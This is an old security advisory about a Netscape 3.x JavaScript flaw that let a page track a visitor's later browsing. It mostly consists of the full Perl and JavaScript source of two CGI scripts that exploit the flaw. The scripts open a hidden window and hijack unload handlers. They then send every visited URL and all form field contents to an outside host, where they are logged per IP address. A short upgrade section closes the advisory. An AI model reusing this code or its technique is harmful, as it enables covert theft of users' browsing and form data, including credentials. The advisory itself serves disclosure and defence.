COMMAND
javascript
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
This is variation to the javascript #1. I say variation since
CERT and Netscape are saying that Netscape 3.02 is fixing this,
it didn't appear to fix the problem demonstrated at:
http://www.aleph2.com/tracker/
This page demonstrates a bug discovered with Netscape's
implementation of JavaScript. If your version and platform is
affected, your subsequent browsing activities are currently being
tracked. Known affected versions are Netscape 3.x for all
platforms, including the just-released 3.02 which supposedly
fixes this problem. Credit goes to Dan Brumleve.
Here is the source of the two CGI scripts that make this work on
page mentioned above. An explanation of how the exploit works is
included as a comment in the tracker.cgi source.
Source of tracker.cgi (one part):
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
#
# ----------------------------------------------------------------
# Explanation of the exploit:
#
# When your browser loads this page, another window ("infect.cgi")
# is created using the onLoad mechanism. If you're using
# X-windows this window will be placed off the screen because its
# size overflows into its position, otherwise it will simply be
# 0x0.
#
# When the "infect.cgi" window loads it sets the original window's
# onUnload function to some JavaScript code that copies the
# location and form data into the values of a form in the
# "infect.cgi" window. This should not be possible to do, but I
# found a way to use "javascript:" URLs to pass private data
# between windows.
#
# After the original window copies its information into the form
# in "infect.cgi" it tells that form to submit (the action being
# itself). Here is where the big problem happens: The original
# window's onUnload function exits before the "infect.cgi" window
# finishes changing location. By the time the "infect.cgi" window
# finishes submitting, the original window is at a new location,
# so the "infect.cgi" window changes the onUnload function of the
# new document as soon as it loads, and the cycle continues...
chop($tm = `date`);
$log = "/www/html/tracker/logs/log-$ENV{REMOTE_ADDR}.txt";
unless (-e $log) {
open(FP, "> $log");
print FP <<EOT;
Below is a list of all the URLs you've visited since
$tm, each one followed by the
contents of any forms on those pages.
EOT
close(FP);
}
print <<EOF;
Content-type: text/html
<html>
<head>
<title>Tracker</title>
</head>
<body bgcolor="#000000" text="#ffffff"
link="#ff0000" vlink="#ff0000" alink="#ff0000" onLoad="window.open('http://www.aleph2.com/tracker/infect.cgi', 'infect', 'width=65529,height=65536')">
.... [the original source of web page] ....
Source of infect.cgi:
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
$infect = "http://www.aleph2.com/tracker/infect.cgi";
print <<EOF;
Content-type: text/html
<html>
<head>
<title>Infect</title>
<script>
function infect_window(w) {
var str = "", i;
w.onunload = new Function(
'var i, j, v;' +
'v = window.open("", "infect"); ' +
'v.document.data.url.value = location; ' +
'v.document.data.fd.value = ""; ' +
'for (i = 0; i < document.forms.length; i++) { ' +
' v.document.data.fd.value += "<form%20action%3d\\\\"" + ' +
' escape(document.forms[i].action) + "\\\\"%20method%3d\\\\"" +' +
' escape(document.forms[i].method) + "\\\\">%0A";' +
' for (j = 0; j < document.forms[i].elements.length; j++) {' +
' v.document.data.fd.value += "<input%20type%3d\\\\"" + ' +
' escape(document.forms[i].elements[j].type) + "\\\\"%20name%3d\\\\"" + ' +
' escape(document.forms[i].elements[j].name) + "\\\\"%20value%3d\\\\"" + ' +
' escape(document.forms[i].elements[j].value) + "\\\\">%0A";' +
' } ' +
' v.document.data.fd.value += "</form>%0A"; ' +
'} ' +
'v.location = v.document.data.action + "?url=" + ' +
' v.document.data.url.value + "&fd=" + v.document.data.fd.value');
}
function infect() {
infect_window(window.opener);
}
</script>
</head>
<body onLoad=infect()>
<form name=data action="$infect" method=post>
<input type=hidden name=url>
<input type=hidden name=fd>
</form>
</body>
</html>
EOF
exit 0 if fork;
if ($ENV{QUERY_STRING}) {
$input = $ENV{QUERY_STRING};
$fn = "/www/html/tracker/logs/log-" . $ENV{REMOTE_ADDR} . ".txt";
@fields = split(/&/, $input);
foreach $a (@fields) {
$a =~ s/\+/ /g;
($n, $v) = split(/=/, $a);
$v =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$input{$n} = $v;
}
@fields = split(/\n+/, $input{fd});
$fd = "";
foreach $f (@fields) {
$f = " " . $f;
$fd .= $f . "\n";
}
open(FP, ">> $fn") || die;
chop($tm = `date`);
print FP "$tm $input{url}\n$fd";
close(FP);
}
exit 0;
SOLUTION
Communicator 4.01 did not seem to be affected by the problem.
Users of Netscape 3.x version should upgrade to Netscape 3.04.
Since Netscape Navigator is installed by default on IRIX 6.2+
operating systems, solution for them is or to install or upgrade
to version 3.04 or later of the Netscape Navigator program.
Silicon Graphics provides a customized Netscape Navigator 3.04
subsystem for IRIX 5.3, 6.2, 6.3 and 6.4 and it can be found at
the following URL:
http://www.sgi.com/Products/Evaluation/